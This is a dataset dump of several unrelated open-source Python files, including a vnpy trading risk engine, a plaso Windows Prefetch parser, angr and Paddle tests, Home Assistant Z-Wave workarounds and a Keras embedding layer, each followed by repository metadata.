def test_outputs_bytes(self):
(return_code, stdout, stderr) = assert_python_ok('-m', 'calendar', '--type=html', '2010')
self.assertEqual(stdout[:6], b'<?xml ')
def test_main():
support.run_unittest(
OutputTestCase,
CalendarTestCase,
MondayTestCase,
SundayTestCase,
TimegmTestCase,
MonthRangeTestCase,
LeapdaysTestCase,
ConsoleOutputTestCase
)
if __name__ == "__main__":
test_main()
| gpl-3.0 | 9,221,925,756,879,070,000 | 55.078287 | 206 | 0.577716 | false |
cmbclh/vnpy1.7 | build/lib/vnpy/trader/app/riskManager/rmEngine.py | 1 | 9304 | # encoding: UTF-8
'''
This module implements the risk management engine, which provides a set of
commonly used risk-control functions:
1. Order flow control (maximum number of orders allowed per unit of time)
2. Total trade limit (cap on the total volume traded per day)
3. Single order size control (limit on the volume of any single order)
'''
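# Illustrative usage (a sketch only; assumes a vnpy mainEngine/eventEngine pair
# created by the usual vnpy startup script, plus an orderReq/gatewayName from
# the trading code):
#
#   rm = RmEngine(mainEngine, eventEngine)   # wires itself into mainEngine
#   rm.switchEngineStatus()                  # toggle risk checking on/off
#   if rm.checkRisk(orderReq):               # gate an order request
#       mainEngine.sendOrder(orderReq, gatewayName)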
import json
import platform
from vnpy.event import Event
from vnpy.trader.vtEvent import *
from vnpy.trader.vtFunction import getJsonPath
from vnpy.trader.vtGateway import VtLogData
from vnpy.trader.vtConstant import (EMPTY_INT, EMPTY_FLOAT,EMPTY_STRING, EMPTY_UNICODE)
########################################################################
class RmEngine(object):
"""风控引擎"""
settingFileName = 'RM_setting.json'
settingFilePath = getJsonPath(settingFileName, __file__)
    name = u'Risk Manager'
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine):
"""Constructor"""
self.mainEngine = mainEngine
self.eventEngine = eventEngine
        # bind this engine to the main engine's risk engine reference
        mainEngine.rmEngine = self
        # whether risk checking is enabled
        self.active = False
        # order flow control
        self.orderFlowCount = EMPTY_INT     # number of orders within the current window
        self.orderFlowLimit = EMPTY_INT     # maximum orders allowed per window
        self.orderFlowClear = EMPTY_INT     # window length before the counter is reset (seconds)
        self.orderFlowTimer = EMPTY_INT     # timer tracking when to reset the counter
        # single order size
        self.orderSizeLimit = EMPTY_INT     # maximum volume of a single order
        # trade statistics
        self.tradeCount = EMPTY_INT         # number of contracts traded today
        self.tradeLimit = EMPTY_INT         # limit on contracts traded today
        # per-symbol cancel statistics
        self.orderCancelLimit = EMPTY_INT   # limit on cancel count per symbol
        self.orderCancelDict = {}           # map of symbol -> cancel count
        # working orders
        self.workingOrderLimit = EMPTY_INT  # maximum number of working orders
self.loadSetting()
self.registerEvent()
#----------------------------------------------------------------------
def loadSetting(self):
"""读取配置"""
with open(self.settingFilePath) as f:
d = json.load(f)
# 设置风控参数
self.active = d['active']
self.orderFlowLimit = d['orderFlowLimit']
self.orderFlowClear = d['orderFlowClear']
self.orderSizeLimit = d['orderSizeLimit']
self.tradeLimit = d['tradeLimit']
self.workingOrderLimit = d['workingOrderLimit']
self.orderCancelLimit = d['orderCancelLimit']
#----------------------------------------------------------------------
def saveSetting(self):
"""保存风控参数"""
with open(self.settingFilePath, 'w') as f:
# 保存风控参数
d = {}
d['active'] = self.active
d['orderFlowLimit'] = self.orderFlowLimit
d['orderFlowClear'] = self.orderFlowClear
d['orderSizeLimit'] = self.orderSizeLimit
d['tradeLimit'] = self.tradeLimit
d['workingOrderLimit'] = self.workingOrderLimit
d['orderCancelLimit'] = self.orderCancelLimit
            # write out as JSON
jsonD = json.dumps(d, indent=4)
f.write(jsonD)
#----------------------------------------------------------------------
def registerEvent(self):
"""注册事件监听"""
self.eventEngine.register(EVENT_TRADE, self.updateTrade)
self.eventEngine.register(EVENT_TIMER, self.updateTimer)
self.eventEngine.register(EVENT_ORDER, self.updateOrder)
#----------------------------------------------------------------------
def updateOrder(self, event):
"""更新成交数据"""
# 只需要统计撤单成功的委托
order = event.dict_['data']
if order.status != STATUS_CANCELLED:
return
if order.symbol not in self.orderCancelDict:
self.orderCancelDict[order.symbol] = 1
else:
self.orderCancelDict[order.symbol] += 1
#----------------------------------------------------------------------
def updateTrade(self, event):
"""更新成交数据"""
trade = event.dict_['data']
self.tradeCount += trade.volume
#----------------------------------------------------------------------
def updateTimer(self, event):
"""更新定时器"""
self.orderFlowTimer += 1
# 如果计时超过了流控清空的时间间隔,则执行清空
if self.orderFlowTimer >= self.orderFlowClear:
self.orderFlowCount = 0
self.orderFlowTimer = 0
#----------------------------------------------------------------------
def writeRiskLog(self, content):
"""快速发出日志事件"""
# 发出报警提示音
if platform.uname() == 'Windows':
import winsound
winsound.PlaySound("SystemHand", winsound.SND_ASYNC)
# 发出日志事件
log = VtLogData()
log.logContent = content
log.gatewayName = self.name
event = Event(type_=EVENT_LOG)
event.dict_['data'] = log
self.eventEngine.put(event)
#----------------------------------------------------------------------
def checkRisk(self, orderReq):
"""检查风险"""
# 如果没有启动风控检查,则直接返回成功
if not self.active:
return True
# 检查委托数量
if orderReq.volume > self.orderSizeLimit:
self.writeRiskLog(u'单笔委托数量%s,超过限制%s'
%(orderReq.volume, self.orderSizeLimit))
return False
# 检查成交合约量
if self.tradeCount >= self.tradeLimit:
self.writeRiskLog(u'今日总成交合约数量%s,超过限制%s'
%(self.tradeCount, self.tradeLimit))
return False
# 检查流控
if self.orderFlowCount >= self.orderFlowLimit:
self.writeRiskLog(u'委托流数量%s,超过限制每%s秒%s'
%(self.orderFlowCount, self.orderFlowClear, self.orderFlowLimit))
return False
# 检查总活动合约
workingOrderCount = len(self.mainEngine.getAllWorkingOrders())
if workingOrderCount >= self.workingOrderLimit:
self.writeRiskLog(u'当前活动委托数量%s,超过限制%s'
%(workingOrderCount, self.workingOrderLimit))
return False
# 检查撤单次数
if orderReq.symbol in self.orderCancelDict and self.orderCancelDict[orderReq.symbol] >= self.orderCancelLimit:
self.writeRiskLog(u'当日%s撤单次数%s,超过限制%s'
%(orderReq.symbol, self.orderCancelDict[orderReq.symbol], self.orderCancelLimit))
return False
# 对于通过风控的委托,增加流控计数
self.orderFlowCount += 1
return True
#----------------------------------------------------------------------
def clearOrderFlowCount(self):
"""清空流控计数"""
self.orderFlowCount = 0
self.writeRiskLog(u'清空流控计数')
#----------------------------------------------------------------------
def clearTradeCount(self):
"""清空成交数量计数"""
self.tradeCount = 0
self.writeRiskLog(u'清空总成交计数')
#----------------------------------------------------------------------
def setOrderFlowLimit(self, n):
"""设置流控限制"""
self.orderFlowLimit = n
#----------------------------------------------------------------------
def setOrderFlowClear(self, n):
"""设置流控清空时间"""
self.orderFlowClear = n
#----------------------------------------------------------------------
def setOrderSizeLimit(self, n):
"""设置委托最大限制"""
self.orderSizeLimit = n
#----------------------------------------------------------------------
def setTradeLimit(self, n):
"""设置成交限制"""
self.tradeLimit = n
#----------------------------------------------------------------------
def setWorkingOrderLimit(self, n):
"""设置活动合约限制"""
self.workingOrderLimit = n
#----------------------------------------------------------------------
def setOrderCancelLimit(self, n):
"""设置单合约撤单次数上限"""
self.orderCancelLimit = n
#----------------------------------------------------------------------
def switchEngineStatus(self):
"""开关风控引擎"""
self.active = not self.active
if self.active:
self.writeRiskLog(u'风险管理功能启动')
else:
self.writeRiskLog(u'风险管理功能停止')
#----------------------------------------------------------------------
def stop(self):
"""停止"""
self.saveSetting()
| mit | -7,094,344,327,007,677,000 | 30.79845 | 118 | 0.469405 | false |
ijat/Hotspot-PUTRA-Auto-login | PyInstaller-3.2/PyInstaller/config.py | 1 | 1630 | #-----------------------------------------------------------------------------
# Copyright (c) 2005-2016, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License with exception
# for distributing bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
"""
This module holds run-time PyInstaller configuration.
Variable CONF is a dict() with all configuration options that are necessary
for the build phase. Build phase is done by passing .spec file to exec()
function. CONF variable is the only way how to pass arguments to exec() and
how to avoid using 'global' variables.
NOTE: Having 'global' variables does not play well with the test suite
because it does not provide isolated environments for tests. Some tests might
fail in this case.
NOTE: The 'CONF' dict() is cleaned after building phase to not interfere with
any other possible test.
To pass any arguments to build phase, just do:
from PyInstaller.config import CONF
CONF['my_var_name'] = my_value
And to use this variable in the build phase:
from PyInstaller.config import CONF
foo = CONF['my_var_name']
This is the list of known variables. (Please update it if necessary.)
cachedir
hasUPX
hiddenimports
noconfirm
pathex
ui_admin
ui_access
upx_dir
workpath
tests_modgraph - cached PyiModuleGraph object to speed up tests
"""
# NOTE: Do not import other PyInstaller modules here. Just define constants here.
CONF = {
# Unit tests require this key to exist.
'pathex': [],
}
| gpl-3.0 | 8,850,864,767,512,552,000 | 27.596491 | 81 | 0.684049 | false |
xurantju/angr | tests/test_veritesting.py | 9 | 2565 | import nose
import angr
import logging
l = logging.getLogger('angr_tests.veritesting')
import os
location = str(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../binaries/tests'))
addresses_veritesting_a = {
'x86_64': 0x400674
}
addresses_veritesting_b = {
'x86_64': 0x4006af
}
def run_veritesting_a(arch):
    # TODO: add timeout control, since a failed state merging can run for a very long time
#logging.getLogger('angr.analyses.sse').setLevel(logging.DEBUG)
proj = angr.Project(os.path.join(os.path.join(location, arch), "veritesting_a"),
load_options={'auto_load_libs': False},
use_sim_procedures=True
)
ex = proj.surveyors.Explorer(find=(addresses_veritesting_a[arch], ), enable_veritesting=True)
r = ex.run()
nose.tools.assert_not_equal(len(r.found), 0)
# Make sure the input makes sense
for f in r.found:
input_str = f.state.plugins['posix'].dumps(0)
nose.tools.assert_equal(input_str.count('B'), 10)
def run_veritesting_b(arch):
#logging.getLogger('angr.analyses.sse').setLevel(logging.DEBUG)
#logging.getLogger('angr.surveyor').setLevel(logging.DEBUG)
#logging.getLogger('angr.surveyors.explorer').setLevel(logging.DEBUG)
proj = angr.Project(os.path.join(os.path.join(location, arch), "veritesting_b"),
load_options={'auto_load_libs': False},
use_sim_procedures=True
)
ex = proj.surveyors.Explorer(find=(addresses_veritesting_b[arch], ),
enable_veritesting=True,
veritesting_options={'enable_function_inlining': True})
r = ex.run()
nose.tools.assert_not_equal(len(r.found), 0)
# Make sure the input makes sense
for f in r.found:
input_str = f.state.plugins['posix'].dumps(0)
nose.tools.assert_equal(input_str.count('B'), 35)
def test_veritesting_a():
# This is the most basic test
for arch in addresses_veritesting_a.keys():
yield run_veritesting_a, arch
def test_veritesting_b():
# Advanced stuff - it tests for the ability to inline simple functions
# as well as simple syscalls like read/write
for arch in addresses_veritesting_b.keys():
yield run_veritesting_b, arch
if __name__ == "__main__":
for test_func, arch_name in test_veritesting_a():
test_func(arch_name)
for test_func, arch_name in test_veritesting_b():
test_func(arch_name)
| bsd-2-clause | -1,652,851,049,905,606,000 | 35.126761 | 102 | 0.630409 | false |
joachimmetz/plaso | plaso/parsers/winprefetch.py | 4 | 7030 | # -*- coding: utf-8 -*-
"""Parser for Windows Prefetch files."""
import pyscca
from dfdatetime import filetime as dfdatetime_filetime
from dfdatetime import semantic_time as dfdatetime_semantic_time
from plaso.containers import events
from plaso.containers import time_events
from plaso.containers import windows_events
from plaso.lib import definitions
from plaso.lib import specification
from plaso.parsers import interface
from plaso.parsers import manager
class WinPrefetchExecutionEventData(events.EventData):
"""Windows Prefetch event data.
Attributes:
executable (str): executable filename.
    version (int): format version.
mapped_files (list[str]): mapped filenames.
number_of_volumes (int): number of volumes.
path_hints (list[str]): possible full paths to the executable.
prefetch_hash (int): prefetch hash.
run_count (int): run count.
volume_device_paths (list[str]): volume device paths.
volume_serial_numbers (list[int]): volume serial numbers.
"""
DATA_TYPE = 'windows:prefetch:execution'
def __init__(self):
"""Initializes event data."""
super(WinPrefetchExecutionEventData, self).__init__(
data_type=self.DATA_TYPE)
self.executable = None
self.mapped_files = None
self.number_of_volumes = None
self.path_hints = None
self.prefetch_hash = None
self.run_count = None
self.version = None
self.volume_device_paths = None
self.volume_serial_numbers = None
class WinPrefetchParser(interface.FileObjectParser):
"""A parser for Windows Prefetch files."""
_INITIAL_FILE_OFFSET = None
NAME = 'prefetch'
DATA_FORMAT = 'Windows Prefetch File (PF)'
@classmethod
def GetFormatSpecification(cls):
"""Retrieves the format specification.
Returns:
FormatSpecification: format specification.
"""
format_specification = specification.FormatSpecification(cls.NAME)
format_specification.AddNewSignature(b'SCCA', offset=4)
format_specification.AddNewSignature(b'MAM\x04', offset=0)
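    # The 'SCCA' signature at offset 4 matches uncompressed Prefetch files; the
    # 'MAM\x04' signature at offset 0 matches the compressed variant used since
    # Windows 10.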
return format_specification
def _ParseSCCAFile(self, parser_mediator, scca_file):
"""Parses a Windows Prefetch (SCCA) file.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
scca_file (pyscca.file): Windows Prefetch (SCCA) file
Raises:
IOError: if the Windows Prefetch (SCCA) file cannot be parsed.
"""
format_version = scca_file.format_version
executable_filename = scca_file.executable_filename
prefetch_hash = scca_file.prefetch_hash
run_count = scca_file.run_count
number_of_volumes = scca_file.number_of_volumes
volume_serial_numbers = []
volume_device_paths = []
path_hints = []
for volume_information in iter(scca_file.volumes):
volume_serial_number = volume_information.serial_number
volume_device_path = volume_information.device_path
volume_serial_numbers.append(volume_serial_number)
volume_device_paths.append(volume_device_path)
timestamp = volume_information.get_creation_time_as_integer()
if timestamp:
event_data = windows_events.WindowsVolumeEventData()
event_data.device_path = volume_device_path
event_data.origin = parser_mediator.GetFilename()
event_data.serial_number = volume_serial_number
date_time = dfdatetime_filetime.Filetime(timestamp=timestamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_CREATION)
parser_mediator.ProduceEventWithEventData(event, event_data)
for filename in iter(scca_file.filenames):
if not filename:
continue
if (filename.startswith(volume_device_path) and
filename.endswith(executable_filename)):
_, _, path = filename.partition(volume_device_path)
path_hints.append(path)
mapped_files = []
for entry_index, file_metrics in enumerate(scca_file.file_metrics_entries):
mapped_file_string = file_metrics.filename
if not mapped_file_string:
parser_mediator.ProduceExtractionWarning(
'missing filename for file metrics entry: {0:d}'.format(
entry_index))
continue
file_reference = file_metrics.file_reference
if file_reference:
mapped_file_string = (
'{0:s} [{1:d}-{2:d}]').format(
mapped_file_string, file_reference & 0xffffffffffff,
file_reference >> 48)
mapped_files.append(mapped_file_string)
event_data = WinPrefetchExecutionEventData()
event_data.executable = executable_filename
event_data.mapped_files = mapped_files
event_data.number_of_volumes = number_of_volumes
event_data.path_hints = path_hints
event_data.prefetch_hash = prefetch_hash
event_data.run_count = run_count
event_data.version = format_version
event_data.volume_device_paths = volume_device_paths
event_data.volume_serial_numbers = volume_serial_numbers
timestamp = scca_file.get_last_run_time_as_integer(0)
if not timestamp:
parser_mediator.ProduceExtractionWarning('missing last run time')
date_time = dfdatetime_semantic_time.NotSet()
else:
date_time = dfdatetime_filetime.Filetime(timestamp=timestamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_LAST_RUN)
parser_mediator.ProduceEventWithEventData(event, event_data)
# Check for the 7 older last run time values available since
# format version 26.
if format_version >= 26:
for last_run_time_index in range(1, 8):
timestamp = scca_file.get_last_run_time_as_integer(last_run_time_index)
if not timestamp:
continue
date_time = dfdatetime_filetime.Filetime(timestamp=timestamp)
date_time_description = 'Previous {0:s}'.format(
definitions.TIME_DESCRIPTION_LAST_RUN)
event = time_events.DateTimeValuesEvent(
date_time, date_time_description)
parser_mediator.ProduceEventWithEventData(event, event_data)
def ParseFileObject(self, parser_mediator, file_object):
"""Parses a Windows Prefetch file-like object.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): file-like object.
"""
scca_file = pyscca.file()
try:
scca_file.open_file_object(file_object)
except IOError as exception:
parser_mediator.ProduceExtractionWarning(
'unable to open file with error: {0!s}'.format(exception))
return
try:
self._ParseSCCAFile(parser_mediator, scca_file)
except IOError as exception:
parser_mediator.ProduceExtractionWarning(
'unable to parse file with error: {0!s}'.format(exception))
finally:
scca_file.close()
manager.ParsersManager.RegisterParser(WinPrefetchParser)
| apache-2.0 | 1,235,760,220,335,901,000 | 34.15 | 79 | 0.696159 | false |
luotao1/Paddle | python/paddle/fluid/tests/unittests/test_squeeze2_op.py | 2 | 2178 | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest
import paddle
paddle.enable_static()
# Correct: General.
class TestSqueezeOp(OpTest):
def setUp(self):
self.op_type = "squeeze2"
self.init_test_case()
self.inputs = {"X": np.random.random(self.ori_shape).astype("float64")}
self.init_attrs()
self.outputs = {
"Out": self.inputs["X"].reshape(self.new_shape),
"XShape": np.random.random(self.ori_shape).astype("float64")
}
def test_check_output(self):
self.check_output(no_check_set=['XShape'])
def test_check_grad(self):
self.check_grad(["X"], "Out")
def init_test_case(self):
self.ori_shape = (1, 3, 1, 40)
self.axes = (0, 2)
self.new_shape = (3, 40)
def init_attrs(self):
self.attrs = {"axes": self.axes}
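# Note: squeeze2 removes size-1 dimensions; with axes (0, 2) the base case above
# turns shape (1, 3, 1, 40) into (3, 40). The auxiliary XShape output records the
# input shape for the grad kernel, which is why it is excluded from comparison
# via no_check_set=['XShape'].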
# Correct: There is a negative (minus) axis.
class TestSqueezeOp1(TestSqueezeOp):
def init_test_case(self):
self.ori_shape = (1, 20, 1, 5)
self.axes = (0, -2)
self.new_shape = (20, 5)
# Correct: No axes input.
class TestSqueezeOp2(TestSqueezeOp):
def init_test_case(self):
self.ori_shape = (1, 20, 1, 5)
self.axes = ()
self.new_shape = (20, 5)
# Correct: Only part of the axes are squeezed.
class TestSqueezeOp3(TestSqueezeOp):
def init_test_case(self):
self.ori_shape = (6, 1, 5, 1, 4, 1)
self.axes = (1, -1)
self.new_shape = (6, 5, 1, 4)
if __name__ == "__main__":
unittest.main()
| apache-2.0 | -133,971,170,509,584,770 | 26.923077 | 79 | 0.629936 | false |
kiith-sa/QGIS | python/plugins/processing/taudem/slopearea.py | 4 | 4036 | # -*- coding: utf-8 -*-
"""
***************************************************************************
slopearea.py
---------------------
Date : October 2012
Copyright : (C) 2012 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'October 2012'
__copyright__ = '(C) 2012, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from PyQt4.QtGui import *
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.ProcessingLog import ProcessingLog
from processing.core.ProcessingConfig import ProcessingConfig
from processing.core.GeoAlgorithmExecutionException import \
GeoAlgorithmExecutionException
from processing.parameters.ParameterRaster import ParameterRaster
from processing.parameters.ParameterNumber import ParameterNumber
from processing.outputs.OutputRaster import OutputRaster
from processing.tools.system import *
from processing.taudem.TauDEMUtils import TauDEMUtils
class SlopeArea(GeoAlgorithm):
SLOPE_GRID = 'SLOPE_GRID'
AREA_GRID = 'AREA_GRID'
SLOPE_EXPONENT = 'SLOPE_EXPONENT'
AREA_EXPONENT = 'AREA_EXPONENT'
SLOPE_AREA_GRID = 'SLOPE_AREA_GRID'
def getIcon(self):
return QIcon(os.path.dirname(__file__) + '/../images/taudem.png')
def defineCharacteristics(self):
self.name = 'Slope Area Combination'
self.cmdName = 'slopearea'
self.group = 'Stream Network Analysis tools'
self.addParameter(ParameterRaster(self.SLOPE_GRID, 'Slope Grid',
False))
self.addParameter(ParameterRaster(self.AREA_GRID,
'Contributing Area Grid', False))
self.addParameter(ParameterNumber(self.SLOPE_EXPONENT, 'Slope Exponent'
, 0, None, 2))
self.addParameter(ParameterNumber(self.AREA_EXPONENT, 'Area Exponent',
0, None, 1))
self.addOutput(OutputRaster(self.SLOPE_AREA_GRID, 'Slope Area Grid'))
def processAlgorithm(self, progress):
commands = []
commands.append(os.path.join(TauDEMUtils.mpiexecPath(), 'mpiexec'))
processNum = ProcessingConfig.getSetting(TauDEMUtils.MPI_PROCESSES)
if processNum <= 0:
raise GeoAlgorithmExecutionException('Wrong number of MPI \
processes used.\nPlease set correct number before running \
TauDEM algorithms.')
commands.append('-n')
commands.append(str(processNum))
commands.append(os.path.join(TauDEMUtils.taudemPath(), self.cmdName))
commands.append('-slp')
commands.append(self.getParameterValue(self.SLOPE_GRID))
commands.append('-sca')
commands.append(self.getParameterValue(self.AREA_GRID))
commands.append('-par')
commands.append(str(self.getParameterValue(self.SLOPE_EXPONENT)))
commands.append(str(self.getParameterValue(self.AREA_EXPONENT)))
commands.append('-sa')
commands.append(self.getOutputValue(self.SLOPE_AREA_GRID))
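        # Illustrative only (hypothetical paths and values): the assembled
        # command resembles
        #   mpiexec -n 4 <taudem>/slopearea -slp slope.tif -sca area.tif
        #           -par 2 1 -sa slopearea.tif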
loglines = []
loglines.append('TauDEM execution command')
for line in commands:
loglines.append(line)
ProcessingLog.addToLog(ProcessingLog.LOG_INFO, loglines)
TauDEMUtils.executeTauDEM(commands, progress)
| gpl-2.0 | 6,994,056,990,638,089,000 | 37.807692 | 79 | 0.59886 | false |
demikl/freeboxv5-status | setup.py | 1 | 1180 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
from setuptools import setup
from setuptools.command.install import install
VERSION = "1.1.1"
def readme():
    """Return the long description text from README.md."""
with open('README.md') as f:
return f.read()
class VerifyVersionCommand(install):
"""Custom command to verify that the git tag matches our version"""
description = 'verify that the git tag matches our version'
def run(self):
tag = os.getenv('CIRCLE_TAG')
if tag != VERSION:
info = "Git tag: {0} does not match the version of this app: {1}".format(
tag, VERSION
)
sys.exit(info)
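# Usage sketch (assumes CircleCI exports CIRCLE_TAG): running
# `python setup.py verify` on a tagged build aborts when the git tag does not
# match VERSION above.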
setup(
name='freebox_v5_status',
version=VERSION,
url='http://github.com/demikl/freeboxv5-status',
author='Mickael Le Baillif',
author_email='[email protected]',
license='MIT',
description='Parse Freebox V5 status page',
long_description=readme(),
keywords='freebox adsl',
packages=['freebox_v5_status'],
scripts=['bin/freebox_to_graphite.py', 'bin/freebox_show_status.py'],
cmdclass={
'verify': VerifyVersionCommand,
}
)
| mit | -3,860,262,843,807,350,000 | 24.652174 | 85 | 0.630508 | false |
Duoxilian/home-assistant | homeassistant/components/zwave/workaround.py | 4 | 2913 | """Zwave workarounds."""
from . import const
# Manufacturers
FIBARO = 0x010f
PHILIO = 0x013c
WENZHOU = 0x0118
SOMFY = 0x47
# Product IDs
PHILIO_SLIM_SENSOR = 0x0002
PHILIO_3_IN_1_SENSOR_GEN_4 = 0x000d
# Product Types
FGFS101_FLOOD_SENSOR_TYPE = 0x0b00
FGRM222_SHUTTER2 = 0x0301
PHILIO_SENSOR = 0x0002
SOMFY_ZRTSI = 0x5a52
# Mapping devices
PHILIO_SLIM_SENSOR_MOTION_MTII = (PHILIO, PHILIO_SENSOR, PHILIO_SLIM_SENSOR, 0)
PHILIO_3_IN_1_SENSOR_GEN_4_MOTION_MTII = (
PHILIO, PHILIO_SENSOR, PHILIO_3_IN_1_SENSOR_GEN_4, 0)
WENZHOU_SLIM_SENSOR_MOTION_MTII = (
WENZHOU, PHILIO_SENSOR, PHILIO_SLIM_SENSOR, 0)
# Workarounds
WORKAROUND_NO_OFF_EVENT = 'trigger_no_off_event'
WORKAROUND_NO_POSITION = 'workaround_no_position'
WORKAROUND_REVERSE_OPEN_CLOSE = 'reverse_open_close'
WORKAROUND_IGNORE = 'workaround_ignore'
# List of workarounds by (manufacturer_id, product_type, product_id, index)
DEVICE_MAPPINGS_MTII = {
PHILIO_SLIM_SENSOR_MOTION_MTII: WORKAROUND_NO_OFF_EVENT,
PHILIO_3_IN_1_SENSOR_GEN_4_MOTION_MTII: WORKAROUND_NO_OFF_EVENT,
WENZHOU_SLIM_SENSOR_MOTION_MTII: WORKAROUND_NO_OFF_EVENT,
}
SOMFY_ZRTSI_CONTROLLER_MT = (SOMFY, SOMFY_ZRTSI)
FIBARO_FGRM222_MT = (FIBARO, FGRM222_SHUTTER2)
# List of workarounds by (manufacturer_id, product_type)
DEVICE_MAPPINGS_MT = {
SOMFY_ZRTSI_CONTROLLER_MT: WORKAROUND_NO_POSITION,
FIBARO_FGRM222_MT: WORKAROUND_REVERSE_OPEN_CLOSE,
}
# Component mapping devices
FIBARO_FGFS101_SENSOR_ALARM = (
FIBARO, FGFS101_FLOOD_SENSOR_TYPE, const.COMMAND_CLASS_SENSOR_ALARM)
FIBARO_FGRM222_BINARY = (
FIBARO, FGRM222_SHUTTER2, const.COMMAND_CLASS_SWITCH_BINARY)
# List of component workarounds by
# (manufacturer_id, product_type, command_class)
DEVICE_COMPONENT_MAPPING = {
FIBARO_FGFS101_SENSOR_ALARM: 'binary_sensor',
FIBARO_FGRM222_BINARY: WORKAROUND_IGNORE,
}
def get_device_component_mapping(value):
"""Get mapping of value to another component."""
if (value.node.manufacturer_id.strip() and
value.node.product_type.strip()):
manufacturer_id = int(value.node.manufacturer_id, 16)
product_type = int(value.node.product_type, 16)
return DEVICE_COMPONENT_MAPPING.get(
(manufacturer_id, product_type, value.command_class))
return None
def get_device_mapping(value):
"""Get mapping of value to a workaround."""
if (value.node.manufacturer_id.strip() and
value.node.product_id.strip() and
value.node.product_type.strip()):
manufacturer_id = int(value.node.manufacturer_id, 16)
product_type = int(value.node.product_type, 16)
product_id = int(value.node.product_id, 16)
result = DEVICE_MAPPINGS_MTII.get(
(manufacturer_id, product_type, product_id, value.index))
if result:
return result
return DEVICE_MAPPINGS_MT.get((manufacturer_id, product_type))
return None
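# Example (hypothetical node values): a node reporting manufacturer_id '0x010f'
# and product_type '0x0301' resolves through DEVICE_MAPPINGS_MT to
# WORKAROUND_REVERSE_OPEN_CLOSE.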
| mit | 5,112,011,688,955,108,000 | 31.366667 | 79 | 0.708205 | false |
justiniso/cmsbase | quokka/ext/commands_collector.py | 11 | 1760 | import sys
import os
import click
import importlib
class CommandsCollector(click.MultiCommand):
"""A MultiCommand to collect all click commands from a given
modules path and base name for the module.
    The command functions need to be in a module inside the commands
folder and the name of the file will be used as the command name.
"""
def __init__(self, modules_path, base_module_name, **attrs):
click.MultiCommand.__init__(self, **attrs)
self.base_module_name = base_module_name
self.modules_path = modules_path
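    # Usage sketch (module and command names are illustrative): a file
    # <base_module>/posts/commands/new.py that exposes a click command named
    # `cli` is listed by this collector as `posts_new`.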
def list_commands(self, ctx):
commands = []
for _path, _dir, _ in os.walk(self.modules_path):
if 'commands' not in _dir:
continue
for filename in os.listdir(os.path.join(_path, 'commands')):
if filename.endswith('.py') and filename != '__init__.py':
cmd = filename[:-3]
_, module_name = os.path.split(_path)
commands.append('{}_{}'.format(module_name, cmd))
commands.sort()
return commands
def get_command(self, ctx, name):
try:
if sys.version_info[0] == 2:
name = name.encode('ascii', 'replace')
splitted = name.split('_')
if len(splitted) <= 1:
return
module_name, command_name = splitted
if not all([module_name, command_name]):
return
module = '{}.{}.commands.{}'.format(
self.base_module_name,
module_name,
command_name)
mod = importlib.import_module(module)
except ImportError:
return
return getattr(mod, 'cli', None)
| mit | 7,906,761,460,361,110,000 | 34.918367 | 74 | 0.550568 | false |
Cadene/keras | keras/layers/embeddings.py | 5 | 4851 | from __future__ import absolute_import
import theano
import theano.tensor as T
from .. import activations, initializations, regularizers, constraints
from ..layers.core import Layer, MaskedLayer
from ..utils.theano_utils import sharedX
from ..constraints import unitnorm
class Embedding(Layer):
'''
        Turn positive integers (indexes) into dense vectors of fixed size.
eg. [[4], [20]] -> [[0.25, 0.1], [0.6, -0.2]]
@input_dim: size of vocabulary (highest input integer + 1)
        @output_dim: size of dense representation
'''
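    # Usage sketch (assumes the Sequential container from this code base):
    #   model.add(Embedding(input_dim=10000, output_dim=128))
    # maps every integer index below 10000 to a trainable 128-d vector.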
def __init__(self, input_dim, output_dim, init='uniform',
W_regularizer=None, activity_regularizer=None, W_constraint=None,
mask_zero=False, weights=None):
super(Embedding, self).__init__()
self.init = initializations.get(init)
self.input_dim = input_dim
self.output_dim = output_dim
self.input = T.imatrix()
self.W = self.init((self.input_dim, self.output_dim))
self.mask_zero = mask_zero
self.params = [self.W]
self.W_constraint = constraints.get(W_constraint)
self.constraints = [self.W_constraint]
self.regularizers = []
self.W_regularizer = regularizers.get(W_regularizer)
if self.W_regularizer:
self.W_regularizer.set_param(self.W)
self.regularizers.append(self.W_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
if self.activity_regularizer:
self.activity_regularizer.set_layer(self)
self.regularizers.append(self.activity_regularizer)
if weights is not None:
self.set_weights(weights)
def get_output_mask(self, train=None):
X = self.get_input(train)
if not self.mask_zero:
return None
else:
return T.ones_like(X) * (1 - T.eq(X, 0))
def get_output(self, train=False):
X = self.get_input(train)
out = self.W[X]
return out
def get_config(self):
return {"name": self.__class__.__name__,
"input_dim": self.input_dim,
"output_dim": self.output_dim,
"init": self.init.__name__,
"activity_regularizer": self.activity_regularizer.get_config() if self.activity_regularizer else None,
"W_regularizer": self.W_regularizer.get_config() if self.W_regularizer else None,
"W_constraint": self.W_constraint.get_config() if self.W_constraint else None}
class WordContextProduct(Layer):
'''
This layer turns a pair of words (a pivot word + a context word,
